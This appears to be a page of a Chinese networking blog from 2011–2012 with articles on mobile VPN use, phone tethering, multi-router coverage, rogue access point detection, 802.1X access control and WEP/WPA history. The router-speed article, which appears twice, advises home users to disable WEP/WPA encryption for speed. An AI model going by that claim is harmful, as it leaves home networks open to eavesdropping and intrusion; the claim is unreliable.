  其次,你需要保证用户的互联网通讯是加密的以防止本地窃听,同时在其它网络上提供访问你的网络的VPN(虚拟专用网)接入。如果你不为这种应用使用内部的VPN,可以考虑使用HotspotShield或者Witopia等外包服务。对于iOS(iPhone、iPad和iPodTouch)和Android设备来说,你可以使用这些设备本地的VPN客户端软件。然而,对于黑莓和WindowsPhone7设备来说,你必须设置一个消息服务器并且设置这个设备使用自己的VPN客户端软件。
  你还应该保证你的面向互联网的服务是安全的,一旦用户在公共网络或者不可信任的网络上不能使用VPN的时候可以使用这个服务。例如,如果你提供你的局域网、广域网或者VPN以外的电子邮件地址,你要保证使用SSL加密以防止本地窃听者。在不可信任的网络中的窃听者能够捕获用户的登录证书或者信息
类别:Wireless N.T | Tags: , , , | 0 条评论, 1138 次阅读
Jan
14
2012
Wifi叠接十二问  
  很多最新款智能手机已经内置了叠接功能, 其让手机的作用超出了通话,发送邮件和网上冲浪,然而并未得到广泛使用。手机可以成为移动热点,为其附近的电脑、平板和其他设备提供无线上网服务。
  In-Stat无线技术研究负责人Allen Nogee称,叠接技术让智能手机用户可以随时随地尽享无线网络而不需要携带其他额外的设备。
  这些手机就好像连接移动数据网络的移动热点设备,可以作为wifi路由为附近的用户分配带宽。当然,作为热点的手机需要为此付费。
  除此以外还需要了解什么吗?在与分析师,网络工程师和其他移动专家交谈过后,笔者罗列出了十二个常见的智能手机叠接技术问题,包括选项和运营商策略。此外,笔者在欧美多个地方使用了几个智能手机作为热点想看看实际使用效果。
  什么是叠接技术?
  叠接技术是指电脑或其他设备共享智能手机的互联网连接。可以通过一个USB电缆,一个蓝牙无线连接或是wifi连接来完成设备间的连接。本文关注的是wifi热点叠接因为它使用起来更方便而且可以同时服务多个用户——而且还因为现在所有笔记本和平板都内置wifi功能。
  热点手机如何工作?
  在连入移动手机数据网络后,智能手机可以通过wifi连接把自己的互联网连接分配给其他客户。任何带有wifi功能的电脑或平板都可以连接到此手机,而wifi路由就存在于智能手机中,因此不需要再携带其他设备。
  哪些手机支持wifi叠接技术?
  主流手机厂商的很多产品都支持此功能,包括安卓,黑莓,iOS,WebOS和WP;而且手机形状与大小也各异。目前,安卓提供的选择最多,有48种热点 模式可用。
  笔者在自己的办公室,家里,火车上和移动的车子中使用了手机热点。基本上,只要你的手机有移动数据连接,就可以作为热点手机使用。
  WiFi叠接技术会增加手机大小和重量吗?
  不会。WiFi叠接需要手机内置WiFi芯片,但是智能手机已经植入了这样的芯片,你可以在网吧或办公室进行连接。热点功能通过软件开启,所以不会增加手机重量。事实上,有些具备热点功能的手机仅重3.2盎司。
  安装起来麻烦吗?
  任何安装过WiFi路由或是使用过移动热点的人都可以开启WiFi叠接。要想把手机当作热点使用,首先要启动叠接应用。
  开启热点后,要输入网络名称对其进行配置,选择加密方式并指定一个密码。目前大多数热点手机都使用WPA2保护,因此其他人无法使用你的移动网络或是读取数据。只需几分钟就可完成安装。
  哪些用户可以连接到热点,同一时间可支持多少用户呢?
  一个手机热点可以与任何带有WiFi联网功能的设备连接,包括各种笔记本,iPad和各种安卓平板。
  手机可以为五到八位用户提供互联网连接,这要取决于网络连接模式。不过,用户一多,网速自然也就会变慢。
  连接速度可以达到什么水平?
  连接速度取决于很多因素,包括手机与最近信号发射塔的距离,网络的繁忙程度。一般来说应该可以达到100Kbps,不过300Kbps是合理的期望。
  如果是3G和4G网络,那么地理位置很重要,因为很多地方没有新网络的覆盖。你可以到运营商网站查询覆盖范围,然后看看在自己所处位置是否可以访问网络。
  一般来说,手机的WiFi信号可达100英尺,因此可以满足当前办公室,海滩甚至是最大号酒店套房的需求。要记住,和WiFi路由一样,你离热点距离越远,信号的强度和带宽都会减小。
  能够一边打电话一边使用热点功能吗?
  这要取决于手机本身以及所使用的网络。大多数4G手机可以满足此需求;CDMA网络的3G手机则不行;在HSPA 3G网络上运行的手机则是个大杂烩。如果这是一个很重要的需求,那么最好是咨询运营商看是否有特定的机型可以同时支持语音与数据传输功能。
  叠接技术怎样收费?
  每个网络的叠接收费都不同,所以很难进行比较。事先,最好咨询一下运营商,谨慎消费。
  可以使用第三方叠接应用取代运营商的订购费用吗?
  如果你不怕这样做可能出现的风险,且你的手机有内置WiFi功能,就可以下载并使用某些应用,如为iPhone开发的MyWi,为安卓开发的Android WiFi Tether或是为塞班开发的JoikuSpot Light WiFi Hotspot,下载这些应用并安装到手机中运行就可以开启热点了。这些应用与手机内置叠接应用的功效一样,只是没有运营商授权和收费而已。
  无疑,你使用这些不收费应用时,运营商是不乐意的,因为这减少了他们的收入,而且他们会对自己网络上的应用进行监控。有些运营商可能会关闭这类服务,有些可能让你自动升级到叠接计划并实施收费。要了解清楚运营商的服务条款,搞清楚自己的权利义务。
  这些手机在海外也可以作为热点使用吗?
  有些可以,有些不行,买之前就要确定这一点。通常,如果手机支持HSPA或HSPA+技术,那么在欧洲,澳洲,新西兰,以及非洲部分区域,亚洲和南美洲应该都不成问题。不过你可能要升级服务包,使其可以支持国际数据漫游。
  如果你去到的国家不在上述几个区域之内,In-Stat的Nogee推荐可以租用带热点功能的手机使用。例如,你可以租用HTC MyTouch 4G,这款手机适合任何欧盟国家以及瑞士,可同时为四个设备提供热点服务。租用的话,大概是12美元一天,80美元一周或是200美元一月,有500MB的流量包,适合短期使用。
  在不同国家的热点操作
  笔者自己携带使用Verizon网络的热点手机进行尝试。LG Revolution和摩托罗拉 Droid 3效果不错,但是对于不同的情境它们也可用。因为它可以用于Verizon 4G LTE网络,前者在美国等地有较强的速度优势,而后者速度稍慢,但是在欧洲效果不错。
  笔者在主页上点击了移动热点图标,两款手机都弹出了热点设置页面。配置完热点的网络名称后,将其配置为安全的WPA2加密,然后输入密码。这些设置一般一两分钟就可完成。
  笔者在纽约市测试了LG Revolution想看看它在Verizon 4G LTE网络上的性能。使用惠普笔记本接入该热点,经SpeedTest.net宽带基站测速,其下载速度达到了19.6Mbps,上传速度达到了4.5Mbps。而且其峰值更令人印象深刻:下载速度21Mbps,上传速度5.6Mbps。当然这些是在LTE下产生的数字。如果你在3G网络中使用,速度肯定要慢一些。
  下一步,测试了Verizon 3G网络下的摩托罗拉 Droid 3。虽然它达不到Revolution在LTE下的速度,但是它适合HSPA网络。在纽约市,Droid 3的平均下载和上传速度分别为1.4Mbps和747Kbps,下载峰值达到2.1Mbps,上传峰值为824Kbps。这是笔者常用有线宽带速度的一半,但是对于旅途中的用户而言,这个速度还是令人满意的。
  在去往密歇根的路上,笔者早晚都用Droid 3的叠接功能与惠普笔记本连接。其间,平均下载和上传速度分别为1.4Mbps和620Kbps,峰值分别为2.2Mbps和651Kbps。
  跨国旅行期间,平均下载速度为1.5Mbps,平均上传速度为640Kbps。笔者使用Droid 3热点连接惠普笔记本以及iPad,查看电子地图,听网络收音机,看视频,玩游戏并对一个网站进行升级。最惊讶的是发现在从伦敦开往巴黎的欧洲之星列车上,还有足够带宽看下一站的地图以及阅读新闻。
  这种数据消耗也有负面影响。使用Droid 3的热点功能,连接iPad播放在线视频会让电池在3小时15分钟左右就耗尽,而使用普通的数据传输,其电池可使用15小时左右。换言之,如果你要使用手机热点功能,请先确保随身携带充电器,而且要注意电耗。
类别:Wireless N.T | Tags: , , | 0 条评论, 1007 次阅读
Jan
14
2012
  
  利用无线接入点作为中继器扩展网络覆盖范围由于曾经多次遇到过这一问题,并且非常具有代表意义(还将节省大量费用);因此,我决定在这里将解决方案发布出来。情况是这样的:如果出现需要使用无线网络,但所处范围又太大,一台无线路由器无法实现完全覆盖的情况。并且,由于价格过于昂贵,所以,购买一台专业路由器(可以扩大覆盖范围)不属于可行的选择,而增强器的效果似乎又不好;这时间,为了让所有客户和员工都被同一张无线网络覆盖,应该采取什么样的措施?
  其实,这项工作其实是相当简单的。所有需要的设备和支持项目就是:
  ◆两台无线路由器。为了让工作更简单,我建议使用固件相同的同一类型。
  ◆一条可用的网络连接。
  ◆一台可以通过硬拔线连接到路由器上对配置进行调整的机器。
  由于每一种无线路由器的具体设置都是不同的,所以,在这里我就大概地描述一下。将通用方式转化为针对具体路由器的特定操作不是很困难的事情。
  先让我们确认一下要进行的操作:
  ◆为两台无线接入点(无线路由器)设置相同的服务集标识符,这样的话,覆盖范围就可以叠加起来。
  ◆在两台路由器上设置无线安全策略。
  ◆对路由器设置进行调整防止DHCP或频道方面出现冲突。
  现在,我们了解了工作的原理,开始部署吧!
  第一步:设置服务集标识符
  第一步也是最容易的步骤。所有要做的工作就是将两台路由器的SSID设定为相同的。这样的操作应该非常简洁明了。如果这些路由器采用了不同SSID的话,当一台移动设备的位置发生变化时,就可能会出现不得不选择加入新网络的情况。
  第二步:设置无线安全策略
  与第一步类似,在这里,需要为两台无线路由器设置相同的无线安全策略。这就意味着安全类型和密码都必须相同。如果设置存在差异的话,移动设备将无法实现在网络间无缝漫游。
  第三步:设置DHCP
  现在,操作开始变得有点难度了。我们需要对两台路由器进行设置,以保证IP地址得到了妥善处理,各自路由器的DHCP服务也不会产生冲突。这时,首先要做的事情就是为每台无线路由器分配一个静态IP地址。在这里我们选择的是192.168.100.*地址类型。我们决定将192.168.100.1的地址分配给网关了,所以,就需要使用192.168.100.2和192.168.100.3作为无线路由器的地址。现在我们将.2地址作为主无线路由器的地址,而.3作为辅助无线路由器的地址。接下来,就是另一个关键点了。当为路由器设置静态IP地址时,会希望同时只能使用一台路由器(或者说在网络中一次只能连接一台路由器)。因此,在启动路由器的时间,很可能会默认为192.168.100.1,所以,正确的做法应该是先打开第一台使用静态IP地址的路由器,然后再打开第二台使用静态IP地址的路由器。
  在静态IP地址集的情况下,我们需要使用DHCP分配地址。为了防止出现地址冲突,所以,只能由一台路由器提供DHCP服务。因此,在辅助路由器上的DHCP服务必须被关闭。而在第一台路由器上,就需要打开它,但也要进行设置,将地址分配的起点控制在192.168.100.4以后。千万不能容许它使用已经分配给辅助无线路由器使用的.3地址。
  最后,我们就可以对主无线路由器和辅助无线路由器的信道进行设置,防止出现使用同一信道引起冲突的情况(为了确保在信道方面不会出现问题,可以选择使用6和11信道)。
  第四步:安装并启用网络
  最后的工作,就是为两台路由器找到可以将建筑整体覆盖到无线网络中的位置。请务必牢记,在以太网中这两台路由器需要属于相互“可见”的。解决这一问题的最简单方法就是通过墙壁上的插座直接连接到网络上(采用和路由器相同的IP地址模式)。如果不能实现这种模式的话,就应该选择利用5类双绞线将它们连接起来(这一小项目在成本方面的投入接近于零)。当安装到位,并连接完成后,就可以启动设备,实现网络覆盖了。一旦开始运行,就可以使用移动设备连接到其中的一台路由器上。在建立连接后,就可以在房间中移动,确认覆盖范围的有效性。如果没有出现问题,那么,恭喜你了,这又可以节省不少费用了!
类别:Wireless N.T | Tags: , | 0 条评论, 1011 次阅读
Jul
15
2011
多接入点网络如何判断可靠传播信号
  
  如果一个区域内有两个或者更多的网络接入点,那么设备(比如:笔记本)怎么辨别从这些接入点发出的信号?
  首先,每个WiFi设备都有自己独特的物理地址,在出厂时已经设置好,也可以重新配置。比如一个Linksys WiFi 5赫兹无线接入点的物理地址可能是00:25:9C:57:0C:0F,这个地址包含在路由器发送的每帧里,所以其他无线设备可以区分是谁发送了这一帧。
  其次,每个WiFi网络都有自己的名字,叫做扩展服务集标识符(ESSID,通常也简称SSID)。比如,一个双频Linksys接入点可能有两个无线设备,每个有独立的物理地址但相同的SSID(这里称为NetA),这个SSID在用于建立无线连接的管理帧中,它包含由接入点发送的信号,用来传播它们支持的网络或者处理客户链入接入点的请求。
  现在,假如我们想在NetA旁安装另外一个接入点,注意是新建一个单独的网络。为了能做到这样,我们给新路由一个不同的SSID(比如NetB)。连接到NetA的客户收到的仍然是以前接入点的信号,而需要接入NetB的用户将要从新接入点接收信号,所以你应该改变默认的SSID接入点,以使世界范围内所有的linksys的SSID不冲突,冲突会导致意外连接。
  或者,假如我们想要安装第二个接入点,扩展网络。所以我们要给新接入口同样的SSID(NetA)。客户仍然收听的是NetA传出的信号,现在由新旧接入口一起发送。每个客户从最强的信号中辨别出发送端物理地址,处理相关请求。由此在客户端和“最好的”接入点中产生了一个中介,尽管新旧接入口是同样的SSID,中介产生后,发送的每个数据帧中就包含被选出的接入口的物理地址,使该接入口知道它负责处理那些帧,虽然其他接入口可能也会收到这些帧,但不会处理没有发给它的帧。
  注意其他一些影响客户端接入点交流的因素,比如,一个接收2.4赫兹频道的用户不会接收到5赫兹频道的接入口信号,虽然他们在同一个领域。因此每个设备必须接收相同频率,才能交流。而且,新802.11设备必须选择混合模式,以使旧版802.11设备能知道它们接听的是什么。最后,每当客户端需要接入新接入口,它必须符合接入口数据频率和安全需求,这就是为什么所有的接入口传播相同的SSID是如此重要,因为可以有相同的被支持的数据频率和安全设置。否则,客户端可能会不停的尝试连接,但连接不正确,而是连到其他接入口,导致连接不稳。
类别:Wireless N.T | Tags: , , | 0 条评论, 1061 次阅读
Jul
15
2011
无线路由器传输速率实际上并不如产品介绍上面的快,这是什么原因呢?难道是商家做的虚假标识吗?其实不然,真正的原因还让看看文章来具体了解下吧。

无线局域网,也被称为WLAN(Wireless LAN),已经成为越来越多用户采用的组网方式。无线网络安装十分方便,不需要重新布线。因此也不会破坏家庭原有装修,相比有线网络,无线网络要灵活得多。

在使用过程中,我们发现尽管WLAN没有的排线的麻烦,并且使用也很方便,但有时我们会发现其信号不太稳定,数据传输速度有变慢的现象,基本上很难达到相关所标称的无线路由器传输速度。比如一款标称为54Mbps(实际上无线路由器传输速率在20Mbps左右)的WLAN网络,但其显示传输速度只有11Mbps(实际传输速率在4Mbps左右)、5.5Mbps(实际传输速率在2Mbps左右)或更低,最到这种情况我们应该怎样处理呢?

首先我们先简单了解下无线网络数据传输速度变慢的原因,无线电波在空气中传播很容易被各种障碍物、干扰源给干扰,这就自然而然会造成WLAN传输速度变慢。此外无线网络的传输距离是有限的,尽管一般标称的无线路由器传输距离可以达到100~300米,但是在实际使用中如果有阻隔的话,这个距离会急剧缩短并会导致数据传输速度变慢。

知道了传输速度变慢的原因我们就可以有的放矢地来着手解决这个问题了。首先在布局的时候我们就要把握好,无线路由器与配备无线网卡的电脑之间最好能够通视,尽量避免它们之间有墙壁阻挡,特别是承重墙(钢筋水泥墙)。我们知道,为了减少对人体的辐射,无线路由器的功率一般都不大,因此在使用过程中很容量受到附近电子设备的干扰,因此在设置无线路由器的摆放位置时,我们一定要记得远离微波炉、冰箱等家电。

良好的天线也是确保路由器无线传输距离和稳定性的有效保证,一些高档无线路由器会使用双天线,一般来说多天线的产品总比单天线的产品在传输性能上更有保障,如果有可能我们尽量选择双天线或者更多天线的无线路由器。另外天线的增益大小对数据传输的影响也非常重要,普通路由器一般只标配了天线增益为2dBi全向天线,但是许多高性能的无线路由器配备的确是3dBi或5dBi全向天线。毫无疑问,同等环境下,采用5dBi全向天线的无线路由器的性能肯定要优于2-3dBi全向天线的产品。因此我们可以通过改用高增益的天线来改善无线信号状况。

无线路由器和网卡之间的配套也是提升无线数据传输速度的一个重要因素,我们知道,目前市场上无线传输标准有802.11G、G+、N、B等多种标准,比如我们使用的路由器采用的是108Mbps的802.11G +标准,但无线网卡使用的是11Mbps(802.11b)标准,因此在其实际速度肯定达不到108Mbps,这时我们就需要升级网卡以达到最好的兼容效果。在选购相关产品的时候,我们一定要选择采用相同标准的无线路由器和网卡,这样才能最大限度的减少兼容性问题的发生。

前面我们介绍的主要是硬件方面对于无线路由器传输速度的影响,在软件方面,合理的设置也有利于提供无线路由的数据传输速度。我们知道,现在绝大多数无线路由器都支持WEP或WPA加密,加密的采用虽然有效的提升家庭网络的保密性能,但其或多或少的会影响数据传输速度。

无线网络对于一般的家庭来说,WEP或WPA加密作用不大,因此我们可以关闭或禁用这项功能。此外有时我们可以通过连接互联网升级无线路由器的驱动来改善无线传输的性能。
类别:Wireless N.T | Tags: , , | 0 条评论, 1033 次阅读
Jun
4
2011
接入点可能会被某用户建立了一个,其目的是为了将一台笔记本电脑带到休息室后自己仍能访问互联网。内部的工程师也有可能安装一个无线路由器,自己搭建一个测试网络,但在测试结束后有可能忘了禁用这个无线网。这些建立未授权的接入点的人往往本身并没有什么恶意,但是这并不能说这些接入点没有危害。如果你认为攻击者并不会找无线连接或者不会利用这些连接,那么,不妨用谷歌搜索一下与TJX公司有关的危害,然后再检查一下自己的网络。

NetStumbler、 Kismet以及其它的一些软件工具对于确认区域内的接入点确实有用,但是,这些工具并不能提供太多的信息。你要问一问,你发现的这些接入点位于你的网络上吗,它位于公司的网络上吗,还是位于邻居的网络上?除非你的单位处于一个有很少单位的区域,那么,这些工具并不会告诉你所需要的方方面面。简言之,这些工具的作用是有限的。

另外一种选择是扫描你的网络,看看有没有不正常的MAC地址,虽然这种扫描有可能太费时,并且有可能会产生错误。这种方法常用于扫描注册到D-Link等设备的MAC地址,但是由于许多大企业收购了小厂商,此方法就未必有效。例如,由于思科收购了Linksys,故MAC地址显示为思科。如果你拥有单位里众所周知的MAC地址的清单,你可以扫描那些还没有得到许可的任何设备。但是,如果你并没有设备的详细清单,也就无法开始,这种方法就有可能不会太有效。即使你的网络清查很正常,MAC地址扫描也未必百分之百地有效。这是因为设备有可能在网络中移动,或者这些设备有可能不对Ping操作做出响应,或者这些设备有可能在扫描时关闭了电源。

有些无线接入点厂商将无赖接入点的检测功能内置到了其产品中。这种产品能够根据无线信号确认接入点,并借助网络跟踪AP。这种产品可以确认网络端口,并准许你控制它。不过,要注意,这些产品并不便宜。

不管你采用什么技术或技巧来追踪无赖接入点,其关键都在于经常搜寻。PCI DSS(付款卡行业数据安全标准)要求每个季度都要扫描,但是我们认为搜索得更频繁一些更好。你还要为在发现了未授权的接入点后该采取什么应对措施做好准备。

一定要慎重。如果用户需要搭建一个测试网络,IT可以花点儿时间提供一个开关,切不可“一棒子打死”。找到一个开关,将连接移过去。如果用户只是需要无线连接,不妨断开其设备,然后再向他解释使用该设备可能给公司带来的风险。更好的方案是,看看你是否可以在那个地方建立一个授权的无线接入,其它用户将会很喜欢的。如果你还没有编写关于未授权接入点的书面策略,那就赶紧动手吧,让整个单位的人都按照安全策略来上网,岂非乐事?
类别:Wireless N.T | Tags: , | 0 条评论, 1258 次阅读
May
26
2011
无线路由器传输速率实际上并不如产品介绍上面的快,这是什么原因呢?难道是商家做的虚假标识吗?其实不然,真正的原因还让看看文章来具体了解下吧。

无线局域网,也被称为WLAN(Wireless LAN),已经成为越来越多用户采用的组网方式。无线网络安装十分方便,不需要重新布线。因此也不会破坏家庭原有装修,相比有线网络,无线网络要灵活得多。

在使用过程中,我们发现尽管WLAN没有的排线的麻烦,并且使用也很方便,但有时我们会发现其信号不太稳定,数据传输速度有变慢的现象,基本上很难达到相关所标称的无线路由器传输速度。比如一款标称为54Mbps(实际上无线路由器传输速率在20Mbps左右)的WLAN网络,但其显示传输速度只有11Mbps(实际传输速率在4Mbps左右)、5.5Mbps(实际传输速率在2Mbps左右)或更低,最到这种情况我们应该怎样处理呢?

首先我们先简单了解下无线网络数据传输速度变慢的原因,无线电波在空气中传播很容易被各种障碍物、干扰源给干扰,这就自然而然会造成WLAN传输速度变慢。此外无线网络的传输距离是有限的,尽管一般标称的无线路由器传输距离可以达到100~300米,但是在实际使用中如果有阻隔的话,这个距离会急剧缩短并会导致数据传输速度变慢。

知道了传输速度变慢的原因我们就可以有的放矢地来着手解决这个问题了。首先在布局的时候我们就要把握好,无线路由器与配备无线网卡的电脑之间最好能够通视,尽量避免它们之间有墙壁阻挡,特别是承重墙(钢筋水泥墙)。我们知道,为了减少对人体的辐射,无线路由器的功率一般都不大,因此在使用过程中很容量受到附近电子设备的干扰,因此在设置无线路由器的摆放位置时,我们一定要记得远离微波炉、冰箱等家电。

良好的天线也是确保路由器无线传输距离和稳定性的有效保证,一些高档无线路由器会使用双天线,一般来说多天线的产品总比单天线的产品在传输性能上更有保障,如果有可能我们尽量选择双天线或者更多天线的无线路由器。另外天线的增益大小对数据传输的影响也非常重要,普通路由器一般只标配了天线增益为2dBi全向天线,但是许多高性能的无线路由器配备的确是3dBi或5dBi全向天线。毫无疑问,同等环境下,采用5dBi全向天线的无线路由器的性能肯定要优于2-3dBi全向天线的产品。因此我们可以通过改用高增益的天线来改善无线信号状况。

无线路由器和网卡之间的配套也是提升无线数据传输速度的一个重要因素,我们知道,目前市场上无线传输标准有802.11G、G+、N、B等多种标准,比如我们使用的路由器采用的是108Mbps的802.11G +标准,但无线网卡使用的是11Mbps(802.11b)标准,因此在其实际速度肯定达不到108Mbps,这时我们就需要升级网卡以达到最好的兼容效果。在选购相关产品的时候,我们一定要选择采用相同标准的无线路由器和网卡,这样才能最大限度的减少兼容性问题的发生。

前面我们介绍的主要是硬件方面对于无线路由器传输速度的影响,在软件方面,合理的设置也有利于提供无线路由的数据传输速度。我们知道,现在绝大多数无线路由器都支持WEP或WPA加密,加密的采用虽然有效的提升家庭网络的保密性能,但其或多或少的会影响数据传输速度。

无线网络对于一般的家庭来说,WEP或WPA加密作用不大,因此我们可以关闭或禁用这项功能。此外有时我们可以通过连接互联网升级无线路由器的驱动来改善无线传输的性能。
类别:Wireless N.T | Tags: | 0 条评论, 1087 次阅读
May
26
2011
在无线LAN认证系列文章的第一部分中,我们介绍了如何确保来宾无线网络安全。在第二部分,我们探讨无线LAN访问控制的方法,包括创建策略、设备识别和整合其他网络访问控制解决方案。

对于网络安全和无线LAN(WLAN)访问控制,企业已经取得了巨大的突破。最远可追溯到静态可破解的WEP密钥,然后是部署较强的认证和加密所需要的第三方Wi-Fi客户端和OS补丁。现在,一些Wi-Fi设备和现有的操作系统已经可以支持WPA2-Enterprise了,甚至电话等小型可识别设备也可提供支持。

即使有这样一些进步,(具备802.1X认证和AES加密的)WPA2-Enterprise仍然没有占据主导地位。802.1X需要整合很多组件,它们来自多个供应商,并且通常由不同部分管理。要想取得成功就必须要进行规划和协调,包括用户帐号管理、设备分配和网络整合。幸运的是,现在已经出现了更好的有助于解决无线LAN访问控制问题的工具。

从群组策略开始进行WLAN访问控制

虽然使用802.1X的企业往往能够很好地控制公司拥有的笔记本电脑,但这对其它无线设备则不可同日而语,特别是那些不由IT部门采购的设备。

IT经常会在发布笔记本电脑之前将它们添加到Active Directory,是通过使用Group Policy Objects自动配置802.1X参数来反映每个用户的组群成员身份而实现的。Windows 7、Vista和XP都支持802.1X群组策略,包括有线和无线客户,Microsoft Windows Server 2008 R2指南中有这方面的描述:

Access Group Policy Extensions for 802.1X Wired and Wireless

Configure 802.1X Wired Access Clients by using Group Policy Management

Configure 802.1X Wireless Access Clients by using Group Policy Management

但是目前大多数工作人员使用的一些无线设备往往都不是运行在Windows上,甚至也不是IT部门购买的。有些IT部门将这种员工自行购买的大量的智能手机和平板电脑作为来宾设备对待。例如,当CFO从他们的笔记本电脑登录到无线LAN上时,他们可能被要求连接到公司的SSID,并提供基于他们身份和角色的802.1X的登录信息来获得访问权限。然而,当CFO使用他们的个人iPad登录到无线LAN时,可能会连接到只提供因特网访问的来宾SSID。这对于那些还没有处理员工自行购买设备的公司而言是一个“权宜之计”,但是这并不是一个理想的长期策略。

通过设备识别实施WLAN访问控制策略

为了解决这个问题,大量的网络和安全产品目前都使用了设备识别技术。通过观察MAC地址、协议、请求和响应,人们可以猜测(有一定自信的)一个设备的制造商、模型和OS。然后这个“指纹”可以根据访问控制、设备分配和策略目的将设备映射到群组中。

目前,Aruba Networks所拥有的Amigopod  Visitor Management Appliance (VMA)就是一个设备识别工具。该装置可以监控设备使用公司网络所发送的DHCP和HTTP。例如,通过检查这些流量,VMA云,区分CFO的公司笔记本电脑和他个人iPad,可以将每个识别的设备映射到正确的访问策略上。CFO的笔记本电脑可能由于其可信任状态而得到更宽松的访问权限,而iPad则只限于企业的邮件和内部网站的访问。然而,这两种设备发送的所有数据将受到WPA2-Enterprise的保护,其中使用802.1X来控制公司SSID的访问。

这个例子还漏掉了一个问题:CFO的iPad如何配置才能访问公司的SSID?手动配置是一种可能,但是显然自动化分配会更好一些。

自动化的Wi-Fi客户分配和配置文件

在这个例子中,我们的CFO可能先将他的iPad连接到访客SSID,并且访问了提供VMA自动登入页面。VMA将为我们CFO的iPad生成一个配置文件,并通过邮件或SMS发送。通过点击所包含的URL,CFO可以安装802.1X参数和证书,从而使能够iPad访问公司的SSID。

事实上,现在很多产品都提供这种类型的自动化Wi-Fi客户端分配功能。对于iPad和其他iOS设备,Apple的iPhone Configuration Utility可以生成(可选择锁定和加密的)Wi-Fi配置文件,它们可以发送到用户,发布在网站上,或者通过支持iOS4原生MDM的移动设备管理器即时安装。

后者适用于AirWatch、BoxTone、MobileIron、Sybase和其他的类型的设备,可以与企业的Active Directory注册整合在一起,同时为每个已经批准的iPad生成证书。如果有一台iPad丢失了,那么所有安装的MDM文件(包括Wi-Fi设置)都会被删除。然而,MDM并不局限于支持Apple设备——其中很多都可以用来注册和分配Androids、BlackBerrys以及员工拥有的笔记本电脑和上网本。

整合802.1X认证和网络访问控制

由于有了一种有效新无线设备识别方法,在没有IT协助的情况下使用WPA2-Enterprise进行登记并为每个员工应用恰当的访问策略并不是一件困难的事。但是如果WPA2与NAC整合到一起,那么策略的实施效果更佳。

接入端(AP)和控制器经过简单的配置就可以将请求转发到802.1X认证服务器上——其中有很多甚至已经内置在使用本地帐户数据库的认证服务器上了。为了简化多个供应商设备的互操作性,Wi-Fi Alliance现在对所有WPA2-Enterprise 认证的产品进行了Extensible Authentication Protocol (EAP)类型测试,包括EAP-TLS、EAP-TTLS/MSCHAPv2、PEAPv0/EAP-MSCHAPv2、PEAPv1/EAP-GTC、EAP-SIM、EAP-AKA和EAP-FAST。

然而,在没有使用NAC的情况下,802.1X可以作为简单交换使用:如果出错您就会无法连接无线LAN;如果成功,您就可以获得您所在用户/群组的对应访问权限(通常是通过RFC 3580 VLAN标签实现)。但是,如果与NAC一起使用时,802.1X就可以根据用户/群组的身份和设备安全状态来执行策略决定。虽然NAC可以在没有802.1X的情况下执行,但是这二种技术一起使用就可以实现更强大的企业无线LAN访问控制。
类别:Wireless N.T | Tags: , | 0 条评论, 836 次阅读
May
10
2011
无线网络的安全尽管从名字上看似乎是一个针对有线网络的安全选项,其实并不是这样。WEP标准在无线网络的早期已经创建,目标是成为无线局域网WLAN的必要的安全防护层,但是WEP的表现无疑令人非常失望。它的根源在于设计上存在缺陷。

在使用WEP的系统中,在无线网络中传输的数据是使用一个随机产生的密钥来加密的。但是,WEP用来产生这些密钥的方法很快就被发现具有可预测性,这样对于潜在的入侵者来说,就可以很容易的截取和破解这些密钥。即使是一个中等技术水平的无线黑客也可以在两到三分钟内迅速的破解WEP加密。

IEEE 802.11的动态有线等效保密(WEP)模式是二十世纪九十年代后期设计的,当时功能强大的无线网络加密作为有效的武器受到美国严格的出口限制。由于害怕强大的加密算法被破解,无线网络产品是被被禁止出口的。然而,仅仅两年以后,动态有线等效保密模式就被发现存在严重的缺点。但是二十世纪九十年代的错误不应该被当着无线网络安全或者IEEE 802.11标准本身,无线网络产业不能等待电气电子工程师协会修订标准,因此他们推出了临时密钥完整性协议TKIP(动态有线等效保密的补丁版本)。

尽管WEP已经被证明是过时且低效的,但是今天在许多现代的无线访问点和路由器中,它依然被支持。不仅如此,它依然是被个人或公司所使用的最多的加密方法之一。如果你正在使用WEP无线网络加密,如果你对你的网络的安全性非常重视的话,那么以后尽可能的不要再使用WEP,因为那真的不是很安全。

无线网络最初采用的安全机制是WEP(有线等效私密),但是后来发现WEP是很不安全的,802.11组织开始着手制定新的安全标准,也就是后来的802.11i协议。但是标准的制定到最后的发布需要较长的时间,而且考虑到消费者不会因为为了网络的安全性而放弃原来的无线设备,因此Wi-Fi联盟在标准推出之前,在 802.11i草案的基础上,制定了一种称为WPA(Wi-Fi Procted Access)的安全机制,它使用TKIP(临时密钥完整性协议),它使用的加密算法还是WEP中使用的加密算法RC4,所以不需要修改原来无线设备的硬件,WPA针对WEP中存在的问题:IV过短、密钥管理过于简单、对消息完整性没有有效的保护,通过软件升级的方法提高网络的安全性。

WPA的出现给用户提供了一个完整的认证机制,AP根据用户的认证结果决定是否允许其接入无线网络中;认证成功后可以根据多种方式(传输数据包的多少、用户接入网络的时间等)动态地改变每个接入用户的加密密钥。另外,对用户在无线中传输的数据包进行MIC编码,确保用户数据不会被其他用户更改。作为802.11i标准的子集,WPA的核心就是IEEE802.1x和TKIP(Temporal Key Integrity Protocol)。

WPA考虑到不同的用户和不同的应用安全需要,例如:企业用户需要很高的安全保护(企业级),否则可能会泄露非常重要的商业机密;而家庭用户往往只是使用网络来浏览 Internet、收发E-mail、打印和共享文件,这些用户对安全的要求相对较低。为了满足不同安全要求用户的需要,WPA中规定了两种应用模式:企业模式,家庭模式(包括小型办公室)。

根据这两种不同的应用模式,WPA的认证也分别有两种不同的方式。对于大型企业的应用,常采用“802.1x+ EAP”的方式,用户提供认证所需的凭证。但对于一些中小型的企业网络或者家庭用户,WPA也提供一种简化的模式,它不需要专门的认证服务器。这种模式叫做“WPA预共享密钥(WPA-PSK)”,它仅要求在每个WLAN节点(AP、无线路由器、网卡等)预先输入一个密钥即可实现。

这个密钥仅仅用于认证过程,而不用于传输数据的一种无线网络加密。数据加密的密钥是在认证成功后动态生成,系统将保证“一户一密”,不存在像WEP那样全网共享一个加密密钥的情形,因此大大地提高了系统的安全性。
类别:Wireless N.T | Tags: | 0 条评论, 735 次阅读
Apr
18
2011
  
  当用户通过公共Wi-Fi热点进行上网冲浪时,如果遇到网络拥堵,那么可以归咎于以下几个原因:网络的安装和带宽供给成本,以及接入Web的设备数量。
  Springboard Research 研究机构网络连接部门副总经理Bryan Wang认为,设计公共Wi-Fi热点时所面对的挑战,与其说是技术问题,倒不如说是网络利用率和成本的问题。
  虽然在网络高峰时期,可以通过增加热点的方式减轻Wi-Fi网络拥堵情况,但当网络接入进入低谷时段后,网络设备的利用率就会大大下降。
